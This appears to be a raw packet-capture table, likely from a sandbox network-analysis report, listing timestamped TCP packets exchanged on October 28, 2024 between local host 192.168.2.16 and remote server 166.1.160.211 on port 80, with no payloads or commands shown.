                                                                                                                                                              Oct 28, 2024 19:46:17.463824987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.464478016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.464512110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.464528084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.465256929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.465310097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.465312958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.466070890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466105938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466125965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.466139078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466197968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.466926098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466965914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.467020035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.467668056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.467701912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.467751980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.468458891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.468492985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.468540907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.469280958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.469315052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.469347954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.469368935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.470058918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470094919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470114946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.470869064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470910072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470923901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.471663952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.471698999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.471719027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.472459078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.472492933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.472508907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.473206997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.473257065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.473273993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.473287106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.473335981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.573851109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574069977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574105024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574141026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.574820042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574852943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574881077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.575613976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.575648069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.575678110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.576445103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.576493025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.576500893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.576524973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.576580048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.577203989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.577239037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.577291965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.578001976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578037977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578069925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578100920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.578877926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578913927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578939915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.579621077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.579653978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.579685926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.579690933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.579737902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.580416918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.580451012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.580503941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.581222057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581258059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581332922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.581892014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581927061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581975937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581975937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.582854033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.582889080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.582917929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.582921028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.582957029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.582984924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.583817005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.583849907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.583862066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.583883047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.583998919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.584800005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.584836006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.584867954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.584882021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.585825920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.585860014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.585884094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.585894108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.585931063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.585943937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.586724997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.586759090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.586781025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.586791992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.586843014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.587671041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.587706089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.587739944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.587749004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.588639975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.588674068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.588692904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.588707924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.588741064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.588747978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.589629889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.589663982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.589678049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.589698076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.589752913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.590500116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.590533972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.590568066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.590586901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.591415882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.591450930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.591470003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.591483116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.591520071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.591531992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.592370987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.592410088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.592423916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.592442989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.592489958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.593101025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.593135118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.593168020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.593184948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.593934059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.593967915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.593986034 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.594001055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.594034910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.594049931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.594717026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.594752073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.594767094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.594786882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.594830990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.595496893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.595534086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.595566988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.595591068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.596234083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.596286058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.596287966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.596324921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.596359015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.596366882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.596993923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.597040892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.597043037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.597076893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.597140074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.597848892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.597884893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.597918034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.597929955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.598462105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.598498106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.598511934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.598531008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.598566055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.598570108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.599211931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.599246979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.599271059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.599298954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.599350929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.599911928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.599946976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.600059032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.602087021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.693229914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.693408012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.693458080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.693465948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.693873882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.693907976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.693926096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.693947077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.693996906 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.694669008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.694721937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.694756031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.694761992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.695449114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.695482969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.695492029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.695517063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.695552111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.695561886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.696233034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.696266890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.696283102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.696300983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.696351051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.697012901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697047949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697082043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697102070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.697841883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697876930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697891951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.697911978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697947025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.697968006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.698676109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.698710918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.698728085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.698745012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.698801041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.699373960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.699408054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.699441910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.699454069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.700123072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700156927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700165987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.700203896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700236082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700248957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.700766087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700799942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700814962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.700834990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700867891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.700877905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.701529980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701581001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.701581001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701616049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701649904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701663017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.701684952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701726913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.702438116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702471972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702506065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702519894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.702539921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702588081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.703270912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703305006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703352928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703358889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.703387976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703422070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703432083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704103947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704138994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704152107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704173088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704205990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704221010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704916954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704952002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704968929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704986095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705018997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705024004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.705051899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705096006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.705760002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705795050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705827951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705838919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.705862045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705909014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.706593037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706626892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706660032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706676960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.706693888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706727028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706742048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.707425117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.707459927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.707478046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.707494020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.707535028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.707526922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708065987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.708246946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708281994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708298922 CET4972680192.168.2.16166.1.160.211
